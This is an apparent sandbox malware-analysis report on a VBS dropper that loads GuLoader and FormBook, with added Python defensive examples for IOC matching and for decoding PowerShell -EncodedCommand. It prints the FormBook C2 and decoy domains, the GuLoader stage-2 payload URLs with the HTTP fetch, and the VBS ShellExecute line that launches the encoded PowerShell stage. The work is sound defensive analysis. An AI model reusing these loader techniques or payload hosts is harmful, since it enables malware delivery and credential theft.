Windows Analysis Report
New _Inquiry P.O4622.vbs

Overview

General Information

Sample Name: New _Inquiry P.O4622.vbs
Analysis ID: 557838
MD5: 24e935f7534a81a7fd4e32daeab208a5
SHA1: 251ac05ebc8c963418dccddda127d2a81b5097db
SHA256: 5e6d8684c3f71ca6a76d22d1ddc536f302738a3027d22a5b1ce1852c9c551d99
Tags: GuLoader, vbs

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sigma detected: Suspect Svchost Activity
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Potential evasive VBS script found (sleep loop)
Maps a DLL or memory area into another process
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: Suspicious Svchost Process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Creates an undocumented autostart registry key
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.usyeslogistics.com/k6sm/"], "decoy": ["mingshengjewelry.com", "ontimecleaningenterprise.com", "alyssa0.xyz", "ptecex.xyz", "dukfot.online", "pvcpc.com", "iowalawtechnology.com", "nestletranspotation.com", "mysithomes.com", "greenlakespaseattle.com", "evofishingsystems.com", "unilytcs.com", "ordemt.com", "dentalbatonrouge.com", "pictureme360.net", "chalinaslacatalana.com", "newmirrorimage.xyz", "pinklaceandlemonade.com", "rapinantes.com", "yzicpa.com", "josephosman.com", "robsarra.com", "shumgroup.net", "flooringnewhampshire.com", "onceadayman.com", "audiomacklaunch.xyz", "hurryburry.com", "golfvid.info", "tutortenbobemail.com", "tatlitelasorganizasyon.com", "tqgtdd.space", "classicalruns.com", "xx3tgnf.xyz", "galwayartanddesign.com", "qidu.press", "crypto-obmennik.com", "dn360rn001.com", "tridim.tech", "phamhome.com", "mediadollskill.com", "loveatmetaverse.com", "electric4x4parts.com", "azulymargarita.com", "isadoramel.com", "rubyclean.com", "officiallydanellewright.com", "wu8d349s67op.xyz", "detetivepyther.com", "wondubniumgy463.xyz", "registry-finance3.com", "ultracoding.com", "open-4business.com", "supremelt.online", "pangfeng.xyz", "morneview.com", "northfloridapsychic.com", "kg4bppuh.xyz", "friv.asia", "epsilonhomecare.com", "hbina.com", "beachhutprinting.com", "sophoscloudoptix.net", "managemarksol.site", "palestyna24.info"]}
Source: 00000013.00000000.950104658.0000000002A00000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://owanlab.com/bin_DziiNe252.bin"}
Source: New _Inquiry P.O4622.vbs Virustotal: Detection: 8%
Source: New _Inquiry P.O4622.vbs ReversingLabs: Detection: 13%
Source: Yara match File source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORY
Source: https://owanlab.com/bin_DziiNe252.bin Avira URL Cloud: Label: malware
Source: unknown HTTPS traffic detected: 157.7.107.166:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000013.00000002.1065593654.000000001E9C0000.00000040.00000001.sdmp, ieinstal.exe, 00000013.00000002.1065764939.000000001EADF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000013.00000002.1065593654.000000001E9C0000.00000040.00000001.sdmp, ieinstal.exe, 00000013.00000002.1065764939.000000001EADF000.00000040.00000001.sdmp, svchost.exe
Source: Binary string: svchost.pdb source: ieinstal.exe, 00000013.00000002.1060938657.00000000027A0000.00000040.00020000.sdmp, ieinstal.exe, 00000013.00000003.1058405336.0000000002DD4000.00000004.00000001.sdmp
Source: Binary string: svchost.pdbUGP source: ieinstal.exe, 00000013.00000002.1060938657.00000000027A0000.00000040.00020000.sdmp, ieinstal.exe, 00000013.00000003.1058405336.0000000002DD4000.00000004.00000001.sdmp

Networking

Source: C:\Windows\explorer.exe Domain query: www.ordemt.com
Source: Initial file: BinaryStream.SaveToFile Effortsre1, 2
Source: Malware configuration extractor URLs: www.usyeslogistics.com/k6sm/
Source: Malware configuration extractor URLs: https://owanlab.com/bin_DziiNe252.bin
Source: Joe Sandbox View ASN Name: INTERQGMOInternetIncJP
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected:
  GET /bin_DziiNe252.bin HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: owanlab.com
  Cache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: ieinstal.exe, 00000013.00000003.995641802.0000000002D9B000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.1061538373.0000000002D9B000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000003.996004923.0000000002D98000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000003.996129278.0000000002D96000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000003.1058453772.0000000002D9B000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000D.00000002.1024238823.0000000005D81000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000003.871107891.0000000007AC6000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png0~
Source: powershell.exe, 0000000D.00000002.1018870776.0000000004D21000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000003.871107891.0000000007AC6000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html0~
Source: powershell.exe, 0000000D.00000002.1024238823.0000000005D81000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1024238823.0000000005D81000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1024238823.0000000005D81000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000003.871107891.0000000007AC6000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester0~
Source: ieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmp String found in binary or memory: https://gsmservice.tech/bin_DziiNe252.bin
Source: powershell.exe, 0000000D.00000002.1024238823.0000000005D81000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: ieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmp String found in binary or memory: https://owanlab.com/bin_DziiNe252.bin
Source: ieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmp String found in binary or memory: https://owanlab.com/bin_DziiNe252.binhttps://gsmservice.tech/bin_DziiNe252.bin
Source: unknown DNS traffic detected: queries for: owanlab.com
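The extracted configuration is the most useful part of this section. FormBook carries one real C2 (www.usyeslogistics.com/k6sm/) inside a list of decoy domains that it also contacts, so a single resolution such as explorer.exe querying www.ordemt.com (a decoy) proves the infection without pointing at the operator's server, while GuLoader itself fetches stage 2 from owanlab.com with gsmservice.tech held in memory as a fallback. The Python below is an added example written for this page, not part of the Joe Sandbox report or of any vendor tooling: it turns the extracted config into three IOC sets (real C2, decoys, loader hosts) and classifies constructed Sysmon-style DNS events, raising the severity whenever the resolving image is one of the system processes that are network-silent unless something was injected into them (that list, INJECTED_HOSTS, is an assumption specific to this sample). The decoy list is shortened in the code; the full list is printed above.

```python
"""Classify DNS observations against the FormBook and GuLoader configuration
extracted in this report.  Added example for this page; not part of the
sandbox report or of any vendor tooling."""
import json
import ntpath
from urllib.parse import urlsplit

# Copied from the report's "Malware Configuration Extractor" lines.  The decoy
# list is shortened here; the full list is printed in the report.
FORMBOOK_CONFIG = json.loads('''{"C2 list": ["www.usyeslogistics.com/k6sm/"],
    "decoy": ["mingshengjewelry.com", "ordemt.com", "pvcpc.com", "hbina.com",
              "sophoscloudoptix.net", "palestyna24.info"]}''')
GULOADER_URLS = (
    "https://owanlab.com/bin_DziiNe252.bin",      # extracted configuration
    "https://gsmservice.tech/bin_DziiNe252.bin",  # fallback URL seen in ieinstal.exe memory
)
# Processes that resolve names in this report only because code was injected
# into them.  Assumption: this list is specific to this sample.
INJECTED_HOSTS = {"explorer.exe", "svchost.exe", "ieinstal.exe"}


def _norm(host):
    """Lower-case, drop a trailing dot and a leading 'www.' so the config's
    bare decoy names match the 'www.' form seen in the DNS queries."""
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def build_iocs(fb_cfg=FORMBOOK_CONFIG, loader_urls=GULOADER_URLS):
    """Split the config into the real C2 (host -> URI path), the decoys
    FormBook also contacts, and the GuLoader stage-2 hosts."""
    c2 = {}
    for entry in fb_cfg["C2 list"]:
        host, _, path = entry.partition("/")
        c2[_norm(host)] = "/" + path
    decoys = {_norm(d) for d in fb_cfg["decoy"]}
    loader = {_norm(urlsplit(u).hostname) for u in loader_urls}
    return {"c2": c2, "decoy": decoys, "loader": loader}


def classify(event, iocs):
    """Return a finding for one Sysmon-style DNS event (image + query), or
    None if the queried name is not in the extracted configuration."""
    host = _norm(event["query"])
    if host in iocs["c2"]:
        kind, severity = "formbook-c2", "high"
    elif host in iocs["loader"]:
        kind, severity = "guloader-stage2", "high"
    elif host in iocs["decoy"]:
        # A decoy says nothing about the operator's server, but it still
        # proves FormBook is running on the host.
        kind, severity = "formbook-decoy", "medium"
    else:
        return None
    image = ntpath.basename(event["image"]).lower()
    if image in INJECTED_HOSTS:
        severity = "high"   # a system process resolving malware names means injection
    return {"kind": kind, "severity": severity, "image": image, "query": event["query"]}


def triage(events, iocs=None):
    iocs = iocs or build_iocs()
    return [f for f in (classify(e, iocs) for e in events) if f]


# Constructed events modelled on the report: explorer.exe -> www.ordemt.com and
# the stage-2 fetch by ieinstal.exe are in the report, the other two are invented.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\explorer.exe", "query": "www.ordemt.com"},
    {"image": r"C:\Program Files (x86)\Internet Explorer\ieinstal.exe", "query": "owanlab.com"},
    {"image": r"C:\Windows\SysWOW64\svchost.exe", "query": "www.usyeslogistics.com"},
    {"image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "query": "www.example.org"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Block on the C2 and loader hosts, but alert rather than block on the decoys: blocking a decoy changes nothing for the operator and only hides the signal that FormBook is active.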

E-Banking Fraud

Source: Yara match File source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORY

System Summary

Source: C:\Windows\SysWOW64\svchost.exe Dropped file: C:\Users\user\AppData\Roaming\LQM-8D39\LQMlogri.ini
Source: C:\Windows\SysWOW64\svchost.exe Dropped file: C:\Users\user\AppData\Roaming\LQM-8D39\LQMlogrv.ini
Source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
Source: Initial file: obj1.ShellExecute MyFile , " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
Source: Initial file: obj1.ShellExecute "powershell.exe", " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 8085
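The VBS hands its payload to PowerShell through obj1.ShellExecute "powershell.exe", " -EncodedCommand " ..., producing an 8085-byte command line; that is what the "Encrypted powershell cmdline option found", "Very long command line found" and "Suspicious Execution of Powershell with Base64" signatures react to. Note that -EncodedCommand is base64 of UTF-16LE text, not encryption, so the script is fully recoverable from the process-creation event alone, and the SysWOW64 path shows the 32-bit host was chosen deliberately (the later ieinstal.exe target is also 32-bit). The Python below is an added example, not part of the report: it pulls the encoded argument out of a Sysmon-style event, accepting the abbreviated -e/-ec/-enc forms PowerShell allows, decodes it, and scores the event on encoding, command-line length and a script-host parent. The real blob is elided above, so the sample event carries a constructed, harmless script; the LONG_CMDLINE threshold is an assumption.

```python
"""Decode and triage a PowerShell -EncodedCommand launched from wscript.exe,
the chain shown in this report.  Added example, not part of the report; the
encoded blob below is constructed because the real one is elided above."""
import base64
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# "Very long command line" threshold.  The report's real one was 8085 bytes;
# 2048 is an assumption, tune it to your environment.
LONG_CMDLINE = 2048
_TOKEN = re.compile(r'"[^"]*"|\S+')


def _is_encoded_flag(token):
    """PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
    -enc, ...), so match by prefix instead of by the full switch name."""
    if not token or token[0] not in "-/":
        return False
    t = token[1:].lower()
    return bool(t) and "encodedcommand".startswith(t)


def decode_encoded_command(cmdline):
    """Return the decoded script, or None if there is no valid encoded command."""
    tokens = [t.strip('"') for t in _TOKEN.findall(cmdline)]
    for flag, blob in zip(tokens, tokens[1:]):
        if not _is_encoded_flag(flag):
            continue
        try:
            raw = base64.b64decode(blob, validate=True)
            return raw.decode("utf-16-le")   # PowerShell expects UTF-16LE here
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def triage_powershell_event(event):
    """Score one process-creation event (Sysmon Event ID 1 style fields)."""
    cmd = event["command_line"]
    script = decode_encoded_command(cmd)
    parent = ntpath.basename(event.get("parent_image", "")).lower()
    result = {
        "encoded": script is not None,
        "decoded_script": script,
        "cmdline_length": len(cmd),
        "long_cmdline": len(cmd) >= LONG_CMDLINE,
        "parent_is_script_host": parent in SCRIPT_HOSTS,
        "wow64_host": "syswow64" in event["image"].lower(),
    }
    result["score"] = sum(result[k] for k in ("encoded", "long_cmdline", "parent_is_script_host"))
    return result


# Constructed stand-in for the elided blob: a harmless script, encoded the
# way PowerShell expects it.
SAMPLE_SCRIPT = "Write-Output 'constructed stand-in for the elided GuLoader stage'"
SAMPLE_BLOB = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENT = {
    "parent_image": r"C:\Windows\System32\wscript.exe",
    "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
    "command_line": r'"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "'
                    + SAMPLE_BLOB + '"',
}

if __name__ == "__main__":
    print(triage_powershell_event(SAMPLE_EVENT))
```

A wscript.exe parent plus an encoded command is already a strong pairing on most estates; the length check catches the GuLoader case where the encoded stage is kilobytes long even when the script host has been swapped for something else.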
Source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0493CCD8 13_2_0493CCD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0493EA58 13_2_0493EA58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0493EA49 13_2_0493EA49
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07D489F8 13_2_07D489F8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB2EF7 19_2_1EAB2EF7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA06E30 19_2_1EA06E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAAD616 19_2_1EAAD616
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB1FF1 19_2_1EAB1FF1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EABDFCE 19_2_1EABDFCE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9F841F 19_2_1E9F841F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAAD466 19_2_1EAAD466
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA12581 19_2_1EA12581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB25DD 19_2_1EAB25DD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9FD5E0 19_2_1E9FD5E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB2D07 19_2_1EAB2D07
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9E0D20 19_2_1E9E0D20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB1D55 19_2_1EAB1D55
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB22AE 19_2_1EAB22AE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA1EBB0 19_2_1EA1EBB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAA03DA 19_2_1EAA03DA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAADBD2 19_2_1EAADBD2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB2B28 19_2_1EAB2B28
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA120A0 19_2_1EA120A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB20A8 19_2_1EAB20A8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9FB090 19_2_1E9FB090
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB28EC 19_2_1EAB28EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EABE824 19_2_1EABE824
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAA1002 19_2_1EAA1002
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA04120 19_2_1EA04120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9EF900 19_2_1E9EF900
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F2B28 22_2_032F2B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325EBB0 22_2_0325EBB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032EDBD2 22_2_032EDBD2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F22AE 22_2_032F22AE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03244120 22_2_03244120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0322F900 22_2_0322F900
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032E1002 22_2_032E1002
